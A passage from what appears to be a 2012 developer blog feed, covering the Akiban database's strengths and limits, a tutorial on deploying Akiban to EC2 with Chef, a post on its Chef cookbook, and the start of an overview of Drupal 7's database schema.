&lt;p&gt;SQL performance in Akiban is greatly improved due to table grouping and the fact that our entire system (in particular our query optimizer and execution engine) is built from the ground up with this storage architecture in mind. First, queries that join tables within a single table group can execute without the need for a &lt;a href='http://www.akiban.com/blog/2011/08/24/join-for-free-explained/'&gt;join operation&lt;/a&gt;. This is due to how we store related data in table groups hierarchically. Second, &lt;a href='http://www.akiban.com/blog/2011/08/24/group-indexes-in-action'&gt;group indexes&lt;/a&gt; can be created on top of a table group, which means an index can span columns from more than one table. Third, our optimizer can choose from a number of query execution plans that use multiple indexes, such as index intersection and index merging, thereby reducing the amount of data that needs to be processed during various stages of query execution.&lt;/p&gt;
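&lt;p&gt;As a concrete illustration, using the hypothetical tables from the sketch earlier, a query like the following joins two tables that live in the same table group, so it can be answered by walking the interleaved rows rather than executing a join operator:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;-- customers and orders sit in one table group, so no join operator is needed
SELECT c.name, o.order_date
FROM customers c
JOIN orders o ON o.cid = c.cid
WHERE c.cid = 42;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;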

&lt;p&gt;&lt;em&gt;3) Do We Always Need ETL?&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Why is &lt;a href='http://en.wikipedia.org/wiki/Extract,_transform,_load'&gt;ETL&lt;/a&gt; brought up as a solution when someone talks about running complex reports? Obviously in some environments, an ETL process is absolutely needed. But wouldn’t we ideally like to run the queries typically performed in data warehouse environments in real time, without requiring a separate process? An ETL process is typically needed because operational systems cannot handle the load that complex reports would generate; running these types of queries against an operational system would likely cripple it (this is obviously a simplification of a complex process). We’ve had many customers come to us running reports against their operational database who don’t feel they should need to construct a data warehouse for the relatively simple reports they wish to run on their data. In some cases, we tend to agree.&lt;/p&gt;

&lt;p&gt;Depending on who I am talking to, I either get someone really excited when I talk about this (marketing/sales people get all excited due to buzzwords like ETL and real time) or am met with a groan and slight roll of the eyes (a technical person who thinks I am full of shit). I can see why it comes across sounding like something a salesperson would say without actually knowing what they are talking about. I do feel our message here needs work, but with the release of projects like &lt;a href='https://github.com/cloudera/impala'&gt;Impala&lt;/a&gt; from Cloudera and &lt;a href='http://drawntoscale.com/why-spire/'&gt;Spire&lt;/a&gt; from Drawn to Scale, I feel it’s clear there is huge interest in a solution in this area. Akiban can help people fighting these types of problems.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;4) Augmenting Existing Deployments&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Our long-term goal is to become the main database for a customer and the database of choice when a developer starts a new project, but we understand it’s difficult for someone who has developed an entire application with an existing database like MySQL or PostgreSQL. What we have developed to deal with this reality is so-called adapters for existing systems. Our first publicly available adapter is for &lt;a href='http://launchpad.net/akiban-adapter-mysql'&gt;MySQL&lt;/a&gt;; it allows a user to spin up a regular MySQL slave and convert whatever tables they want to be part of a table group to Akiban.&lt;/p&gt;

&lt;h1 id='what_akiban_is_not_good_for_right_now'&gt;What Akiban is Not Good For (right now)&lt;/h1&gt;

&lt;p&gt;Now if you’ve read this far, you might be expecting me to list world hunger as another problem that we solve. We of course have some use cases where we are not suitable, and some drawbacks. So let’s balance the 4 problems I feel Akiban solves with 4 reasons why you might be reluctant to use Akiban at this present time.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;1) Scale out is coming, but not here yet.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Today Akiban is focused on single-node performance, with an eye to developing scale-out functionality in the near future. Our scale-out capability is under development but is not expected to be production ready until next year.&lt;/p&gt;

&lt;p&gt;This assumes you want to deploy Akiban as your main database. If you are deploying Akiban as a MySQL replica in an existing MySQL environment, there is no reason multiple MySQL slaves with Akiban cannot be spun up.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;2) Simple Queries or No Problems&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;If your application really only issues simple queries and does not use an ORM, then Akiban is not really a fit. I would be surprised if someone with such a workload would be experiencing problems.&lt;/p&gt;

&lt;p&gt;If your existing solution is working just fine for you, why change? You would be surprised at the number of customers we talk to who really have no need for our solution since they have no problems or are unlikely to have any need for Akiban in the near future. We are of course happy to work with these customers but we tell them straight up that they probably don’t need Akiban.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;3) Maturity&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Obviously many of the existing relational databases on the market today have a head start on us here (PostgreSQL by almost 30 years). If you are looking for a database solution that has been around for a long time and deployed countless times, Akiban may not be what you are looking for. I will add, though, that we have a few customers where we have been deployed for almost a year (public customer testimonials coming in the next few weeks, all going well).&lt;/p&gt;

&lt;p&gt;However, I will say that this is another reason why we are working on adapters for other database systems. If you are not comfortable trying out a new database like Akiban, spinning it up as a slave in your staging/development environment for testing purposes is pretty low risk and will not affect any existing infrastructure.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;4) Existing knowledge&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;This leads on from point (3) above. If you have built a large infrastructure on another database, it’s likely your staff is highly skilled in that database platform. While Akiban is quite easy to use and administer, as with other database systems, some knowledge of Akiban needs to be gained in order to use the system in the best manner possible. Also, since Akiban is a new solution, not as much troubleshooting information is available publicly. For example, when encountering an issue in MySQL, a simple Google search will likely lead to a page where someone else has documented a resolution for the issue.&lt;/p&gt;

&lt;h1 id='conclusion'&gt;Conclusion&lt;/h1&gt;

&lt;p&gt;This post was an honest attempt at stating what I personally think Akiban is a great solution for and what we are currently not a good fit for. My personal opinion (obviously biased since I work for Akiban) is that the problems we are solving far outweigh the drawbacks of our solution. We will have a scale-out strategy in less than a year, which is obviously important, and you can be sure I will be blogging about that as we develop it. I’d also like to mention that points (3) and (4), which are disadvantages of Akiban, apply to any relatively new database solution and so are not unique to Akiban.&lt;/p&gt;

&lt;p&gt;Input on what we are doing at Akiban is very important to us. If you have any comments that you would like to add, please leave them here or ask on our public &lt;a href='https://groups.google.com/a/akiban.com/d/forum/akiban-user'&gt;mailing list&lt;/a&gt;. Also, if you are curious to try the product out, it can be downloaded for free &lt;a href='http://akiban.com/downloads'&gt;here&lt;/a&gt;.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Deploying Akiban on EC2 with Chef</title>
   <link href="http://posulliv.github.com/2012/09/26/akiban-chef-ec2"/>
   <updated>2012-09-26T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/09/26/akiban-chef-ec2</id>
   <content type="html">&lt;p&gt;This post is a tutorial on how to deploy Akiban on an EC2 instance using chef and the &lt;a href='http://www.opscode.com/hosted-chef/'&gt;Opscode Chef&lt;/a&gt; platform.&lt;/p&gt;

&lt;h1 id='the_opscode_platform'&gt;The Opscode Platform&lt;/h1&gt;

&lt;p&gt;In this article, we&amp;#8217;ll use the Opscode platform since it provides an easy way for anyone to get started with chef. If you are a new user, proceed to &lt;a href='https://community.opscode.com/users/new'&gt;sign up&lt;/a&gt; for a new account. Once you are signed up, the next step is to create a new organization. For this article, I&amp;#8217;m going to create an organization named &lt;code&gt;akiban&lt;/code&gt;. Once your organization is created, you should see the organization in your list of organizations when you click on the &lt;code&gt;Organizations&lt;/code&gt; link at the top right of the opscode console. My view looks like:&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/akiban_opscode_console.png' alt='Opscode console.' /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;h1 id='configure_aws'&gt;Configure AWS&lt;/h1&gt;

&lt;p&gt;An assumption made in this article is that you have an &lt;a href='http://aws.amazon.com/'&gt;AWS&lt;/a&gt; account. If you don&amp;#8217;t, signing up is relatively straightforward.&lt;/p&gt;

&lt;p&gt;Amazon blocks all incoming traffic to EC2 instances by default and SSH is used by chef to access and bootstrap a newly created instance. We want to allow SSH traffic to our EC2 instances and I don&amp;#8217;t want to use the default security group so for this article I created a new security group named &lt;code&gt;akiban&lt;/code&gt; with the appropriate rules (only SSH for now). After creating the new security group and adding the SSH rule, the group details for &lt;code&gt;akiban&lt;/code&gt; look like:&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/akiban_sec_group.png' alt='akiban security group.' /&gt;
&lt;/div&gt;&lt;br /&gt;
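&lt;p&gt;If you prefer the command line, the same group can be created with Amazon&amp;#8217;s EC2 API tools; this assumes the tools are installed and configured with your credentials, and exact flags may vary by tool version:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;ec2-create-group akiban -d "security group for akiban testing"
ec2-authorize akiban -p 22
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;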
&lt;p&gt;I also created a new key pair specifically for this article. I gave this key pair the name &lt;code&gt;akiban&lt;/code&gt;. After creating this key pair, I downloaded the private key to my SSH folder and updated the permissions on the key:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;mv ~/Downloads/akiban.pem ~/.ssh/&lt;/span&gt;
&lt;span class='go'&gt;chmod go-r ~/.ssh/akiban.pem&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h1 id='configure_chef'&gt;Configure chef&lt;/h1&gt;

&lt;p&gt;This article assumes both chef and git are already installed on your workstation. In my case, I ran all these commands on an OS X laptop. Instructions for installing chef can be found on &lt;a href='http://wiki.opscode.com/display/chef/Installation'&gt;Opscode&amp;#8217;s wiki&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The first thing to do is create a chef repository on your workstation with &lt;code&gt;git&lt;/code&gt; and get a clean history:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;git clone git://github.com/opscode/chef-repo.git ~/akiban-chef-repo&lt;/span&gt;
&lt;span class='go'&gt;cd ~/akiban-chef-repo&lt;/span&gt;
&lt;span class='go'&gt;rm -rf .git&lt;/span&gt;
&lt;span class='go'&gt;git init .&lt;/span&gt;
&lt;span class='go'&gt;git add *&lt;/span&gt;
&lt;span class='go'&gt;git commit -a -m &amp;quot;Initial commit.&amp;quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;a href='http://wiki.opscode.com/display/chef/Chef+Repository'&gt;chef repository&lt;/a&gt; is a version controlled directory that contains cookbooks and other components relevant to chef.&lt;/p&gt;

&lt;p&gt;Next, create a &lt;code&gt;.chef&lt;/code&gt; directory within this repository. This directory contains all the configuration files for just this chef repository:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;mkdir -p ~/akiban-chef-repo/.chef&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next, we need to download keys and &lt;code&gt;knife&lt;/code&gt; configuration files from the Opscode platform that will be used for interacting with the Opscode platform. Keys are needed for both your user and organization on the Opscode platform. To retrieve your user key (if you did not download it when signing up), click on your username through the console and click &lt;code&gt;View profile&lt;/code&gt; on the right of that page. Finally, click the &lt;code&gt;get private key&lt;/code&gt; link on your account page as seen below:&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/akiban_chef_user.png' alt='User account profile.' /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;p&gt;After downloading this new key, I placed it in the configuration directory for the chef repository I am using for this article:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;mv ~/Downloads/posulliv.pem ~/akiban-chef-repo/.chef&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For your organization, click on the &lt;code&gt;Regenerate validation key&lt;/code&gt; link and &lt;code&gt;Generate knife config&lt;/code&gt; link from the organization&amp;#8217;s home page. After clicking those 2 links, you will have 2 files (named after your organization, obviously): 1) &lt;code&gt;akiban-validator.pem&lt;/code&gt; and 2) &lt;code&gt;knife.rb&lt;/code&gt;. These 2 files must be moved into the configuration directory for the chef repository being used for this article:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;mv ~/Downloads/akiban-validator.pem ~/akiban-chef-repo/.chef
mv ~/Downloads/knife.rb ~/akiban-chef-repo/.chef
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, whenever we are in the &lt;code&gt;akiban-chef-repo&lt;/code&gt; directory, the &lt;code&gt;knife&lt;/code&gt; utility will connect to the Opscode platform. To verify this, let&amp;#8217;s list the clients our hosted chef server knows about:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt; knife client list
&lt;span class='go'&gt;  akiban-validator&lt;/span&gt;
&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next, &lt;code&gt;knife&lt;/code&gt; needs to be configured with the correct AWS credentials. This is done by adding the following 2 lines to the &lt;code&gt;knife.rb&lt;/code&gt; file in the &lt;code&gt;~/akiban-chef-repo/.chef&lt;/code&gt; directory:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;&lt;span class='n'&gt;knife&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='ss'&gt;:aws_access_key_id&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt;     &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;Your AWS Access Key&amp;quot;&lt;/span&gt;
&lt;span class='n'&gt;knife&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='ss'&gt;:aws_secret_access_key&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;Your AWS Secret Access Key&amp;quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
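&lt;p&gt;If you would rather not keep credentials in a file that might end up committed to version control, &lt;code&gt;knife.rb&lt;/code&gt; is plain Ruby, so one alternative is to read them from environment variables instead (this assumes you export &lt;code&gt;AWS_ACCESS_KEY_ID&lt;/code&gt; and &lt;code&gt;AWS_SECRET_ACCESS_KEY&lt;/code&gt; in your shell):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;# pull AWS credentials from the environment instead of hard-coding them
knife[:aws_access_key_id]     = ENV['AWS_ACCESS_KEY_ID']
knife[:aws_secret_access_key] = ENV['AWS_SECRET_ACCESS_KEY']
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;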
&lt;p&gt;After adding these credentials the EC2 instances associated with the AWS account can be viewed:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt; knife ec2 server list
&lt;span class='go'&gt;Instance ID  Public IP       Private IP      Flavor      Image         SSH Key        Security Groups  State  &lt;/span&gt;
&lt;span class='go'&gt;i-1bcb4f77   50.16.188.89    10.112.233.119  t1.micro    ami-548c783d  akibanweb      AkibanWeb        running&lt;/span&gt;
&lt;span class='go'&gt;i-f814fe97                                   m1.large    ami-548c783d  akibanxxx      akibanxxx        stopped&lt;/span&gt;
&lt;span class='go'&gt;i-39474442   23.20.173.62    10.64.5.187     t1.micro    ami-aecd60c7  designpartner  designpartner    running&lt;/span&gt;
&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h1 id='akiban_cookbook'&gt;Akiban Cookbook&lt;/h1&gt;

&lt;p&gt;chef is now configured to work with the appropriate AWS account. Now we want to bootstrap an EC2 instance with the latest early developer release of Akiban. I covered the cookbook we developed for Akiban in my &lt;a href='http://posulliv.github.com/akiban/2012/08/22/akiban-chef/'&gt;previous post&lt;/a&gt;, and we place it in our chef repository like so:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;knife cookbook site install akibanserver&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This downloads the latest release of the &lt;a href='http://community.opscode.com/cookbooks/akibanserver'&gt;akibanserver cookbook&lt;/a&gt; from the opscode community site. Next, we want to upload this cookbook to our hosted chef server:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;cd ~/akiban-chef-repo&lt;/span&gt;
&lt;span class='go'&gt;knife cookbook upload akibanserver --include-dependencies&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can verify that this cookbook and its dependencies are now available:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt; knife cookbook list
&lt;span class='go'&gt;  akibanserver   0.1.0&lt;/span&gt;
&lt;span class='go'&gt;  apt            1.4.8&lt;/span&gt;
&lt;span class='go'&gt;  openssl        1.0.0&lt;/span&gt;
&lt;span class='go'&gt;  postgresql     1.0.0&lt;/span&gt;
&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h1 id='create_and_verify_ec2_instance'&gt;Create and Verify EC2 Instance&lt;/h1&gt;

&lt;p&gt;We are now ready to create an EC2 instance and have it bootstrap itself and install the Akiban developer edition! Feel free to pick any CentOS or Ubuntu AMI you wish for the command below:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;knife ec2 server create \&lt;/span&gt;
&lt;span class='go'&gt;--run-list akibanserver \&lt;/span&gt;
&lt;span class='go'&gt;--image ami-2d4aa444 \&lt;/span&gt;
&lt;span class='go'&gt;--flavor m1.small \&lt;/span&gt;
&lt;span class='go'&gt;--groups akiban \&lt;/span&gt;
&lt;span class='go'&gt;--ssh-key akiban \&lt;/span&gt;
&lt;span class='go'&gt;--identity-file ~/.ssh/akiban.pem \&lt;/span&gt;
&lt;span class='go'&gt;--ssh-user ubuntu \&lt;/span&gt;
&lt;span class='go'&gt;--node-name akibantest \&lt;/span&gt;
&lt;span class='go'&gt;--availability-zone us-east-1a&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;After kicking off the above command, you will see lots of output! Assuming the command finishes successfully, we verify the server was created by first checking that it appears in the server list output from EC2:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt; knife ec2 server list
&lt;span class='go'&gt;Instance ID  Public IP       Private IP      Flavor      Image         SSH Key        Security Groups  State  &lt;/span&gt;
&lt;span class='go'&gt;i-1bcb4f77   50.16.188.89    10.112.233.119  t1.micro    ami-548c783d  akibanweb      AkibanWeb        running&lt;/span&gt;
&lt;span class='go'&gt;i-f814fe97                                   m1.large    ami-548c783d  akibanxxx      akibanxxx        stopped&lt;/span&gt;
&lt;span class='go'&gt;i-39474442   23.20.173.62    10.64.5.187     t1.micro    ami-aecd60c7  designpartner  designpartner    running&lt;/span&gt;
&lt;span class='go'&gt;i-fd17d380   184.72.187.226  10.34.106.161   m1.small    ami-2d4aa444  akiban         akiban           running&lt;/span&gt;
&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The chef server should also list this instance as a node now:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt; knife node list
&lt;span class='go'&gt;akibantest&lt;/span&gt;
&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The instance is now available and we can log on and start using the Akiban server:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;killarney:akiban-chef-repo posullivan$&lt;/span&gt; ssh -i ~/.ssh/akiban.pem ubuntu@184.72.187.226
&lt;span class='go'&gt;Linux ip-10-34-106-161 2.6.32-305-ec2 #9-Ubuntu SMP Thu Apr 15 04:14:01 UTC 2010 i686 GNU/Linux&lt;/span&gt;
&lt;span class='go'&gt;Ubuntu 10.04 LTS&lt;/span&gt;

&lt;span class='go'&gt;Welcome to Ubuntu!&lt;/span&gt;
&lt;span class='go'&gt; * Documentation:  https://help.ubuntu.com/&lt;/span&gt;

&lt;span class='go'&gt;  System information as of Wed Sep 26 20:28:34 UTC 2012&lt;/span&gt;

&lt;span class='go'&gt;  System load: 0.54             Memory usage: 16%   Processes:       54&lt;/span&gt;
&lt;span class='go'&gt;  Usage of /:  9.3% of 9.92GB   Swap usage:   0%    Users logged in: 0&lt;/span&gt;

&lt;span class='go'&gt;  Graph this data and manage this system at https://landscape.canonical.com/&lt;/span&gt;
&lt;span class='go'&gt;---------------------------------------------------------------------&lt;/span&gt;
&lt;span class='go'&gt;At the moment, only the core of the system is installed. To tune the &lt;/span&gt;
&lt;span class='go'&gt;system to your needs, you can choose to install one or more          &lt;/span&gt;
&lt;span class='go'&gt;predefined collections of software by running the following          &lt;/span&gt;
&lt;span class='go'&gt;command:                                                             &lt;/span&gt;
&lt;span class='go'&gt;                                                                     &lt;/span&gt;
&lt;span class='go'&gt;   sudo tasksel --section server                                     &lt;/span&gt;
&lt;span class='go'&gt;---------------------------------------------------------------------&lt;/span&gt;

&lt;span class='go'&gt;New release &amp;#39;precise&amp;#39; available.&lt;/span&gt;
&lt;span class='go'&gt;Run &amp;#39;do-release-upgrade&amp;#39; to upgrade to it.&lt;/span&gt;

&lt;span class='go'&gt;A newer build of the Ubuntu lucid server image is available.&lt;/span&gt;
&lt;span class='go'&gt;It is named &amp;#39;release&amp;#39; and has build serial &amp;#39;20120913&amp;#39;.&lt;/span&gt;
&lt;span class='go'&gt;*** System restart required ***&lt;/span&gt;
&lt;span class='go'&gt;Last login: Wed Sep 26 20:23:13 2012 from 75-147-9-1-newengland.hfc.comcastbusiness.net&lt;/span&gt;
&lt;span class='gp'&gt;ubuntu@ip-10-212-87-144:~$&lt;/span&gt; psql -h localhost -p 15432 information_schema
&lt;span class='go'&gt;psql (8.4.13, server 8.4.7)&lt;/span&gt;
&lt;span class='go'&gt;Type &amp;quot;help&amp;quot; for help.&lt;/span&gt;

&lt;span class='go'&gt;information_schema=&amp;gt; select * from server_instance_summary;&lt;/span&gt;
&lt;span class='go'&gt;  server_name  | server_version | instance_status |     start_time      &lt;/span&gt;
&lt;span class='go'&gt;---------------+----------------+-----------------+---------------------&lt;/span&gt;
&lt;span class='go'&gt; Akiban Server | 1.4.1.2151     | RUNNING         | 2012-09-26 20:30:04&lt;/span&gt;
&lt;span class='go'&gt;(1 row)&lt;/span&gt;

&lt;span class='go'&gt;information_schema=&amp;gt; &lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h1 id='conclusion'&gt;Conclusion&lt;/h1&gt;

&lt;p&gt;Following the steps in this article, it should be pretty easy to use chef to spin up an EC2 instance with Akiban installed. We are currently starting work on a cookbook for the Akiban Adapter for MySQL; when that is available, I will post a walkthrough detailing how to use it.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Akiban Server Cookbook for Chef</title>
   <link href="http://posulliv.github.com/2012/08/22/akiban-chef"/>
   <updated>2012-08-22T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/08/22/akiban-chef</id>
   <content type="html">&lt;p&gt;Last week I spent some time putting together a cookbook for Akiban that allows the Akiban Server to be easily deployed in environments where &lt;a href='http://www.opscode.com/chef/'&gt;chef&lt;/a&gt; is used. This cookbook is currently available on &lt;a href='https://github.com/akiban/akiban-server-cookbook'&gt;github&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;This cookbook uses the awesome new tool Opscode announced last week - &lt;a href='http://www.opscode.com/blog/2012/08/17/announcing-test-kitchen/'&gt;Test Kitchen&lt;/a&gt;. This makes testing our cookbook extremely easy. Right now, the tests for the Akiban Server cookbook are very similar to the tests developed for the MySQL cookbook. On a system with &lt;code&gt;kitchen&lt;/code&gt; installed, the cookbook can be downloaded and its tests run by simply executing:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;kitchen test&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Running the above results in a virtual machine being downloaded and started using &lt;code&gt;vagrant&lt;/code&gt;. The virtual machine is then provisioned using &lt;code&gt;chef&lt;/code&gt; and the cookbook under test is set up. The Akiban Server cookbook installs the PostgreSQL client (since the Akiban Server speaks the PostgreSQL protocol) and the Akiban Server itself. The tests run to verify everything is working OK are pretty simple at the moment: some data is loaded into a single table and a few simple queries are run to make sure the database server is functioning correctly.&lt;/p&gt;

&lt;p&gt;Another item we implemented that was pretty neat: we use the Travis build system to make sure our cookbook adheres to best practices by running &lt;a href='http://acrmp.github.com/foodcritic/'&gt;foodcritic&lt;/a&gt; on every new push to master.&lt;/p&gt;
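&lt;p&gt;foodcritic can of course also be run locally before pushing. Assuming a working Ruby environment, something like the following lints the cookbook in the current directory (the &lt;code&gt;-f any&lt;/code&gt; flag makes it exit non-zero on any finding, which is what a CI build wants):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;gem install foodcritic
foodcritic -f any .
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;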

&lt;p&gt;Test Kitchen and foodcritic together help us to ensure our cookbooks are high quality. Our main goal is to make sure our customers enjoy the easiest deployment process and since we see many people using &lt;code&gt;chef&lt;/code&gt;, we wanted to make sure we integrate well with environments where &lt;code&gt;chef&lt;/code&gt; is in place.&lt;/p&gt;

&lt;p&gt;I plan on doing a webinar in the near future on deploying Akiban Server with chef. In that webinar, I will be able to do some demos of deploying Akiban in EC2 with &lt;code&gt;chef&lt;/code&gt;.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Digging into Drupal's Schema</title>
   <link href="http://posulliv.github.com/2012/08/02/drupal-er-diagram"/>
   <updated>2012-08-02T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/08/02/drupal-er-diagram</id>
   <content type="html">&lt;p&gt;I&amp;#8217;m relatively new to Drupal internals and most of the &lt;a href='http://akiban.com/'&gt;work&lt;/a&gt; I do is on the database side. While searching for information on Drupal&amp;#8217;s schema, I found very little. During my research, I put together an ER diagram of the schema installed by Drupal 7 (D8 is very similar with only 3 extra tables at time of writing) and decided to share my work. Note that the relationships I discuss here are based on the foreign key documentation that exists in core and my understanding of what I believe other relationships could be. Corrections and comments are very much welcome.&lt;/p&gt;

&lt;h1 id='overview'&gt;Overview&lt;/h1&gt;

&lt;p&gt;I&amp;#8217;ll start off by showing my complete ER diagram below. You will see I grouped tables I found to be related in colored boxes. The image below is just meant to give a general overview of the schema. I will be diving into different parts of the schema in this post. I created this diagram using &lt;a href='http://www.mysql.com/products/workbench/'&gt;MySQL Workbench&lt;/a&gt; and the model can be downloaded from &lt;a href='http://posulliv.github.com/misc/latest_drupal_7.mwb'&gt;here&lt;/a&gt; if someone wishes to open this up in Workbench. This &lt;a href='https://gist.github.com/3231183'&gt;gist&lt;/a&gt; also shows the &lt;code&gt;ALTER TABLE&lt;/code&gt; SQL statements that would need to be issued to actually create these foreign keys in MySQL. I would not recommend doing this right now with Drupal as many things would break.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/all_drupal_7_er.png' alt='Full ER Diagram.' /&gt;
&lt;/div&gt;
&lt;p&gt;Without delving into the relationships and details of this diagram, let&amp;#8217;s first cover some basic details. A stock install of Drupal 7 results in 73 tables being created. 10 of those tables are used for caching purposes:&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Caching Table&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache&lt;/td&gt;&lt;td&gt;caches items not separated out into their own cache tables&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache_block&lt;/td&gt;&lt;td&gt;the block modules can cache already built blocks here&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache_bootstrap&lt;/td&gt;&lt;td&gt;data required during the bootstrap process can be cached in this table&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache_field&lt;/td&gt;&lt;td&gt;stores cached field values&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache_filter&lt;/td&gt;&lt;td&gt;caches already filtered pieces of text&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache_form&lt;/td&gt;&lt;td&gt;caches recently built forms and their storage data&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache_image&lt;/td&gt;&lt;td&gt;caches information about image manipulations that are in progress&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;cache_menu&lt;/td&gt;&lt;td&gt;caches router information as well as generated link trees&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
